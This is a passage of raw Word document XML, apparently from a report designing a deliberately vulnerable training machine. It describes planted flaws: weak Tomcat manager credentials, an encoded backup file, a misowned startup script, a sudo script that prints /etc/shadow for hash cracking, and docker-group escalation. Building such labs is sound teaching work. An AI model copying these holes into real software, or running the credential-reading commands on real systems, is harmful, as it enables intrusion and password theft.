          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-gui"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4179E7" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This creates an initial access vector through weak credentials following a predictable pattern (location + year). The account has excessive privileges enabling WAR file uploads for reverse shell deployment and remote code execution through the manager interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61967AF5" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc223521113"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.4.2 Hidden Backup File with Encoded Credentials</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="64F7E204" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="002F4B94">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>A backup file containing encoded credentials was placed in a discoverable directory, simulating information disclosure vulnerabilities from development remnants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A6AB91" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">File Created: </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/opt/tomcat9/webapps/stocznia/_backup/file.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591093AB" w14:textId="620479AA" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00934C54" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">With content </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00F77002" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F77002" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> 51 31 5a 46 4c 54 49 77 4d 6a 41 74 4d 54 6b 7a 4f 41 3d 3d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFDF796" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This enables testing of directory enumeration (using tools like ffuf or gobuster) and multi-stage decoding. The hex-encoded base64 string simulates obfuscation attempts that provide false security while remaining vulnerable to determined attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4415DFDB" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="009E5B3F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc223521114"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.4.3 File Ownership Misconfiguration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="1639BB70" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="002F4B94">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>The Tomcat startup script was configured with improper ownership to demonstrate common Linux permission mistakes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD87A39" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">File Modified: </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/opt/tomcat9/bin/startup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE22037" w14:textId="0E8450CD"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-rwxr-xr-x 1 redlowo redlowo 1904 Dec 7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2019</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/tomcat9/bin/startup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F98499C" w14:textId="13D49813" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">Configuration Command: </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo chown </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>redlowo:redlowo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/tomcat9/bin/startup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1748B912" w14:textId="52BCBAC6" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This misconfiguration allows user redlowo to modify the startup script, enabling script injection, persistence mechanisms, and potential privilege escalation if Tomcat runs with elevated permissions. It simulates environments where application ownership is incorrectly assigned during installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36394CD7" w14:textId="51A1F525" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc223521115"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.4.4 Sudo Privilege Misconfiguration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="6F61E4E7" w14:textId="653975A3" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00EA3D53">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>A custom script with sudo privileges exposes the</w:t>
      </w:r>
      <w:r w:rsidR="00934C54" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> last line of</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/shadow file, demonstrating how </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>poorly-designed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> administrative tools create security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199769CE" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Script Created:</w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/local/bin/view_last_shadow_lines.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2151C339" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8B022" w14:textId="58BB27D7"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tail -n 1 /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635316C0" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Execution: User redlowo can run: </w:t>
      </w:r>
      <w:r w:rsidRPr="00123285">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo /usr/local/bin/view_last_shadow_lines.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C9F9E" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>This limited exposure enables password hash extraction for offline cracking using tools like John the Ripper or Hashcat, facilitating lateral movement to the next user account in the privilege escalation chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC26090" w14:textId="422B6016" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc223521116"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4.2.4.5 Docker Group Privilege Escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="0418981C" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00EA3D53">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Users in the docker group have root-equivalent privileges through container mount capabilities. An AppArmor profile provides partial restrictions that can be bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D3F307" w14:textId="77777777" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="00F77002">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Docker Group Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859CCBB" w14:textId="530A316B" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00961685">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo groupadd -g 988 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo usermod -aG docker </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stocznia</w:t>
      </w:r>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo usermod -aG docker sopot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00489821" w14:textId="3A971553" w:rsidR="00F77002" w:rsidRPr="00D77DFE" w:rsidRDefault="00F77002" w:rsidP="009025BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">AppArmor Profile: </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/etc/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>apparmor.d</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/docker-stocznia-profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1697F957" w14:textId="77777777"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profile docker-stocznia-profile flags=(attach_disconnected) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7877E9" w14:textId="4B204AFD" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00961685">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    capability, network, file,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319CF19F" w14:textId="77777777"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 xml:space="preserve">    # Allow mounting specific directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE41A4" w14:textId="77777777"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 xml:space="preserve">    mount options</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rw, bind) /home/stocznia/ -&gt; /stocznia/,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E52382" w14:textId="1211E8FE"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 xml:space="preserve">    mount options</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rw, bind) /home/sopot/   -&gt; /sopot/,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209F2A4A" w14:textId="2FCDFBBD" w:rsidR="00F77002" w:rsidRPr="009025BF" w:rsidRDefault="00F77002" w:rsidP="00961685">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    deny mount, /dev/** rw</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00961685" w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009025BF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
